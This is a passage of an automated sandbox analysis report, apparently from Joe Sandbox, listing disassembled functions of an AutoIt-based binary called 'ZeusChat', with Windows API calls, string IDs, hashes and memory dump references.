                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HandleLoadMessageModuleStringwprintf
                                                                                                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                      • API String ID: 4007322891-4153970271
                                                                                                      • Opcode ID: afe30fabcc8c2b5dfb3624d463207571e08e071ef3068ceab152869195660280
                                                                                                      • Instruction ID: cc61535f006dc739cb027c0ad0548e657a97ec71fbedb9590125ba1fcc446427
                                                                                                      • Opcode Fuzzy Hash: afe30fabcc8c2b5dfb3624d463207571e08e071ef3068ceab152869195660280
                                                                                                      • Instruction Fuzzy Hash: 9C315F72A19A82D1EB50FB10E8406BDA361FF84B84FC84032EA4D47699DFBCE50DC750
                                                                                                      APIs
                                                                                                        • Part of subcall function 00007FF752002794: GetWindowLongPtrW.USER32(?,?,00000000,00007FF75204A57D), ref: 00007FF7520027B1
                                                                                                      • PostMessageW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7520B156E
                                                                                                      • GetFocus.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7520B157F
                                                                                                      • GetDlgCtrlID.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7520B158C
                                                                                                      • GetMenuItemInfoW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7520B16C3
                                                                                                      • GetMenuItemCount.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7520B16E1
                                                                                                      • GetMenuItemID.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7520B16F6
                                                                                                      • GetMenuItemInfoW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7520B1731
                                                                                                      • GetMenuItemInfoW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7520B177C
                                                                                                      • CheckMenuRadioItem.USER32 ref: 00007FF7520B17B3
                                                                                                        • Part of subcall function 00007FF7520B02A8: IsWindow.USER32(?,?,?,?,?,?,?,?,?,00007FF75204A2D7), ref: 00007FF7520B036D
                                                                                                        • Part of subcall function 00007FF7520B02A8: IsWindowEnabled.USER32(?,?,?,?,?,?,?,?,?,00007FF75204A2D7), ref: 00007FF7520B037A
                                                                                                      • DefDlgProcW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7520B17EA
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ItemMenu$InfoWindow$CheckCountCtrlEnabledFocusLongMessagePostProcRadio
                                                                                                      • String ID:
                                                                                                      • API String ID: 2672075419-0
                                                                                                      • Opcode ID: 5de48b37807cf5e9572c5b55aff88bc579260c59b463e26447def2c6e42a81eb
                                                                                                      • Instruction ID: 080e903e94ba240d6ec8b2a862c9b451b31059b8ab6f8c2a334c0d7156c1eaf0
                                                                                                      • Opcode Fuzzy Hash: 5de48b37807cf5e9572c5b55aff88bc579260c59b463e26447def2c6e42a81eb
                                                                                                      • Instruction Fuzzy Hash: 88919676B0A65689E760EF65D8407BDA3B1FB44B58F980035DD0D43B85CFB8E84AC320
                                                                                                      APIs
                                                                                                        • Part of subcall function 00007FF75200780C: CreateFileW.KERNEL32 ref: 00007FF752007876
                                                                                                        • Part of subcall function 00007FF7520241D0: GetCurrentDirectoryW.KERNEL32(?,00007FF7520099C7), ref: 00007FF7520241EC
                                                                                                        • Part of subcall function 00007FF752005A50: GetFullPathNameW.KERNEL32(?,00007FF752005A3D,?,00007FF752004C50,?,?,?,00007FF75200109E), ref: 00007FF752005A7B
                                                                                                      • SetCurrentDirectoryW.KERNEL32 ref: 00007FF752009A60
                                                                                                      • SetCurrentDirectoryW.KERNEL32 ref: 00007FF752009BA0
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentDirectory$CreateFileFullNamePathwcscpy
                                                                                                      • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                                      • API String ID: 2207129308-3738523708
                                                                                                      • Opcode ID: da8776b3935f108f372e0f447b79be8c4908acda2ed79a75d128fc386c9bb0f4
                                                                                                      • Instruction ID: 8396ba171adf792433479d199a9cce90187646a6265498775073cf73973ad84c
                                                                                                      • Opcode Fuzzy Hash: da8776b3935f108f372e0f447b79be8c4908acda2ed79a75d128fc386c9bb0f4
                                                                                                      • Instruction Fuzzy Hash: 69129322A1A64285EB10FB21DC805FEE360FB84794FC84132EA4E4769ADFBCD54DC760
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DestroySendStringUninitializeUnregisterWindow
                                                                                                      • String ID: close all
                                                                                                      • API String ID: 1992507300-3243417748
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$_NewEnum$get__NewEnum
                                                                                                      • API String ID: 0-1765764032
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$Window$CreateObjectStockwcscat
                                                                                                      • String ID: -----$SysListView32
                                                                                                      • API String ID: 2361508679-3975388722
                                                                                                      APIs
                                                                                                      • GetSysColorBrush.USER32(?,?,?,?,?,?,?,?,?,00007FF752003C7D,?,?,?,?,?,00007FF752002BC1), ref: 00007FF752003D06
                                                                                                      • LoadCursorW.USER32(?,?,?,?,?,?,?,?,?,00007FF752003C7D,?,?,?,?,?,00007FF752002BC1), ref: 00007FF752003D16
                                                                                                      • LoadIconW.USER32(?,?,?,?,?,?,?,?,?,00007FF752003C7D,?,?,?,?,?,00007FF752002BC1), ref: 00007FF752003D2B
                                                                                                      • LoadIconW.USER32(?,?,?,?,?,?,?,?,?,00007FF752003C7D,?,?,?,?,?,00007FF752002BC1), ref: 00007FF752003D44
                                                                                                      • LoadIconW.USER32(?,?,?,?,?,?,?,?,?,00007FF752003C7D,?,?,?,?,?,00007FF752002BC1), ref: 00007FF752003D5D
                                                                                                      • LoadImageW.USER32 ref: 00007FF752003D89
                                                                                                      • RegisterClassExW.USER32 ref: 00007FF752003DED
                                                                                                        • Part of subcall function 00007FF752003EF8: GetSysColorBrush.USER32 ref: 00007FF752003F4D
                                                                                                        • Part of subcall function 00007FF752003EF8: RegisterClassExW.USER32 ref: 00007FF752003F7E
                                                                                                        • Part of subcall function 00007FF752003EF8: RegisterWindowMessageW.USER32 ref: 00007FF752003F92
                                                                                                        • Part of subcall function 00007FF752003EF8: InitCommonControlsEx.COMCTL32 ref: 00007FF752003FB0
                                                                                                        • Part of subcall function 00007FF752003EF8: ImageList_Create.COMCTL32 ref: 00007FF752003FCB
                                                                                                        • Part of subcall function 00007FF752003EF8: LoadIconW.USER32 ref: 00007FF752003FE4
                                                                                                        • Part of subcall function 00007FF752003EF8: ImageList_ReplaceIcon.COMCTL32 ref: 00007FF752003FF7
                                                                                                      Similarity
                                                                                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                      • String ID: AutoIt v3
                                                                                                      • API String ID: 423443420-1704141276
                                                                                                      Similarity
                                                                                                      • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                      • String ID:
                                                                                                      • API String ID: 1617910340-0
                                                                                                      Similarity
                                                                                                      • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                                      • String ID:
                                                                                                      • API String ID: 3210457359-0
                                                                                                      Similarity
                                                                                                      • API ID: _get_daylight_invalid_parameter_noinfo$ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone
                                                                                                      • String ID: ?
                                                                                                      • API String ID: 500310315-1684325040
                                                                                                      Similarity
                                                                                                      • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageReleaseScreenSendText
                                                                                                      • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                      • API String ID: 3721556410-2107944366
                                                                                                      Similarity
                                                                                                      • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                      • String ID: 2$P
                                                                                                      • API String ID: 93392585-1110268094
                                                                                                      • Opcode ID: c4d75c7bed3dc32d74565b12e7beeeeebc4fd81d0a729176aca41e8b187ce2d2
                                                                                                      • Instruction ID: 287a735dcf3110af81f17f87a946e505ee0e885b175c47c231f68b309516abf3
                                                                                                      • Opcode Fuzzy Hash: c4d75c7bed3dc32d74565b12e7beeeeebc4fd81d0a729176aca41e8b187ce2d2
                                                                                                      • Instruction Fuzzy Hash: F4511532E0665289F7A4BF61DC402BDB7A1FB00758FAC4135CA5E13A95CFB8E44AC760
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: IconLoad_invalid_parameter_noinfo
                                                                                                      • String ID: blank$info$question$stop$warning
                                                                                                      • API String ID: 4060274358-404129466
                                                                                                      • Opcode ID: b636dc1b51594c2af202ed54f4e4bdeb97e8f240ec4436fd1e847df07db7b1d4
                                                                                                      • Instruction ID: 57d992349e3a7086d000bbb1a3110d4cab8fc554059b0a4880102b7abccea9a9
                                                                                                      • Opcode Fuzzy Hash: b636dc1b51594c2af202ed54f4e4bdeb97e8f240ec4436fd1e847df07db7b1d4
                                                                                                      • Instruction Fuzzy Hash: 88218B26B0FB8282FA60BB16AC4017AE351BF54784F9C5031DE4D02796EFFCE409C220
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HandleLoadModuleString$Messagewprintf
                                                                                                      • String ID: %s (%d) : ==> %s: %s %s
                                                                                                      • API String ID: 4051287042-3128320259
                                                                                                      • Opcode ID: 02e40095ef40720f69863dbac7a2070404752031add831b0985804f9b4f72438
                                                                                                      • Instruction ID: c51645de741d8471bcce065ea3d1435ee8ea7719e929857acda272cbdb928d47
                                                                                                      • Opcode Fuzzy Hash: 02e40095ef40720f69863dbac7a2070404752031add831b0985804f9b4f72438
                                                                                                      • Instruction Fuzzy Hash: 0A116571B19B8191D774AB10F8457EEA760FB88744FC80436D64E42B58DEBCD54DC760
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                                      • String ID:
                                                                                                      • API String ID: 1211466189-0
                                                                                                      • Opcode ID: e1e2e441c9291e36cebb6767608181e9d23d9b0bd25b43b6ce96c6e1de2e754f
                                                                                                      • Instruction ID: d141f9cae5aff5ae06ba1710d7fa8afdf2c3fe322c791f4594b41d0d15affd00
                                                                                                      • Opcode Fuzzy Hash: e1e2e441c9291e36cebb6767608181e9d23d9b0bd25b43b6ce96c6e1de2e754f
                                                                                                      • Instruction Fuzzy Hash: CFA1023671A5438AE778AF25994477EB7A1FB84B44F985035DA0E43AA0DF7CEC58C310
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ShowWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 1268545403-0
                                                                                                      • Opcode ID: 87c66640600301fc3614396531e44b743e01540278fec1b87f8964912ffd81f2
                                                                                                      • Instruction ID: 32d9c6c72d0e858702c3654a6d06b3255961838e2192d74a93eb6d30b6f56870
                                                                                                      • Opcode Fuzzy Hash: 87c66640600301fc3614396531e44b743e01540278fec1b87f8964912ffd81f2
                                                                                                      • Instruction Fuzzy Hash: 4F51A631E0E18289F7A5BF29ED8437D9B959F81B44F9C4072C90E462D5CEEDB88CC264
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 3864802216-0
                                                                                                      • Opcode ID: 9674a36d8164cb560b58a036ea6f3e8bd8e6a73e44ede240e929598dcb41685d
                                                                                                      • Instruction ID: 7e933a9cdace1976c377fffec0af35417a99dbd53fd588ca552c31563d549c0a
                                                                                                      • Opcode Fuzzy Hash: 9674a36d8164cb560b58a036ea6f3e8bd8e6a73e44ede240e929598dcb41685d
                                                                                                      • Instruction Fuzzy Hash: 0041AC3661968187E7749F21A854B6EBBA1F798B91F588035EF8E03B54DF7CD848CB00
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID:
                                                                                                      • API String ID: 3215553584-0
                                                                                                      • Opcode ID: 329cf7ad438edc5c76dcb0b9fad9cd181248692e257404cd766d6ec6700348b5
                                                                                                      • Instruction ID: 3d487a865b1007426b28a19906e3f2731eaab4becc4dfdced1a8c4b5293d2dc3
                                                                                                      • Opcode Fuzzy Hash: 329cf7ad438edc5c76dcb0b9fad9cd181248692e257404cd766d6ec6700348b5
                                                                                                      • Instruction Fuzzy Hash: C9C11A22E1E68685E668BF159C0027EAB52BB90784FDD8135DA4E173D1CFBDE44CC3A0
                                                                                                      APIs
                                                                                                      • #77.OLEAUT32(?,?,00000001,00000000,00000001,?,00000000,00000047,?,00007FF752080CA8,?,?,00000000,00007FF7520986CF), ref: 00007FF75208133B
                                                                                                      • #23.WSOCK32(?,?,00000001,00000000,00000001,?,00000000,00000047,?,00007FF752080CA8,?,?,00000000,00007FF7520986CF), ref: 00007FF752081391
                                                                                                      • #23.WSOCK32(?,?,00000001,00000000,00000001,?,00000000,00000047,?,00007FF752080CA8,?,?,00000000,00007FF7520986CF), ref: 00007FF752081478
                                                                                                      • #24.OLEAUT32(?,?,00000001,00000000,00000001,?,00000000,00000047,?,00007FF752080CA8,?,?,00000000,00007FF7520986CF), ref: 00007FF75208149F
                                                                                                      • #23.WSOCK32(?,?,00000001,00000000,00000001,?,00000000,00000047,?,00007FF752080CA8,?,?,00000000,00007FF7520986CF), ref: 00007FF7520814B0
                                                                                                      • #23.WSOCK32(?,?,00000001,00000000,00000001,?,00000000,00000047,?,00007FF752080CA8,?,?,00000000,00007FF7520986CF), ref: 00007FF75208151E
                                                                                                      • #23.WSOCK32(?,?,00000001,00000000,00000001,?,00000000,00000047,?,00007FF752080CA8,?,?,00000000,00007FF7520986CF), ref: 00007FF752081593
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 2585bf9d99523b85a6387ebb36db1e93d42442dc18b734288afeab1606f91b78
                                                                                                      • Instruction ID: e29aef4c7ab13af659496d30c8031951c67cf313d4fa41fee6e6c7f7accd73c5
                                                                                                      • Opcode Fuzzy Hash: 2585bf9d99523b85a6387ebb36db1e93d42442dc18b734288afeab1606f91b78
                                                                                                      • Instruction Fuzzy Hash: 89A1A022A0AA1286FB50AF55C8843BEE761FF44B84F895432DE0D97795DFBCE449C360
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSendWindow$Enabled
                                                                                                      • String ID:
                                                                                                      • API String ID: 3694350264-0
                                                                                                      • Opcode ID: afb273491b6871b9358392d720659e4730aaef88e09809c522e030074b87f941
                                                                                                      • Instruction ID: c21f6ffe01c115e00814616c76552bf7c7743277d67fd0957663a9c8d11a3e69
                                                                                                      • Opcode Fuzzy Hash: afb273491b6871b9358392d720659e4730aaef88e09809c522e030074b87f941
                                                                                                      • Instruction Fuzzy Hash: F6916261E5A64646FBB4AA159C843BFB796AB44B40FCC4032CA5D03691DFBDEC99C320
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
Similarity
• API ID: Menu$CreateItem$DrawInfoInsertPopup
• String ID:
• API String ID: 161812096-0
• Opcode ID: 2e0c978de7f3949c5e4fef75b6087ee8ddd4ddcc90206a13e30e68fd27cedf73
• Instruction ID: 595d971d12474c96f1dddbeb015cc51281f6e00656263daa2b5fcc5641df11ca
• Opcode Fuzzy Hash: 2e0c978de7f3949c5e4fef75b6087ee8ddd4ddcc90206a13e30e68fd27cedf73
• Instruction Fuzzy Hash: 32417036A06B4185E7A0EF62DC806AD77B1FB94B94F984136DE0D17764CFB8D449C720
APIs
Strings
Memory Dump Source
• Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
Similarity
• API ID: MessageSend$CreateObjectStockWindow
• String ID: Msctls_Progress32
• API String ID: 1025951953-3636473452
• Opcode ID: 769d822a731d8b4ab9969762f95a8256fd4e8cf9c5dd72bf7c6db143b8f84875
• Instruction ID: 510ec2c446c04c35f65f5c3a827c17e7f8cb9ffc2feb4859217137e4d6108419
• Opcode Fuzzy Hash: 769d822a731d8b4ab9969762f95a8256fd4e8cf9c5dd72bf7c6db143b8f84875
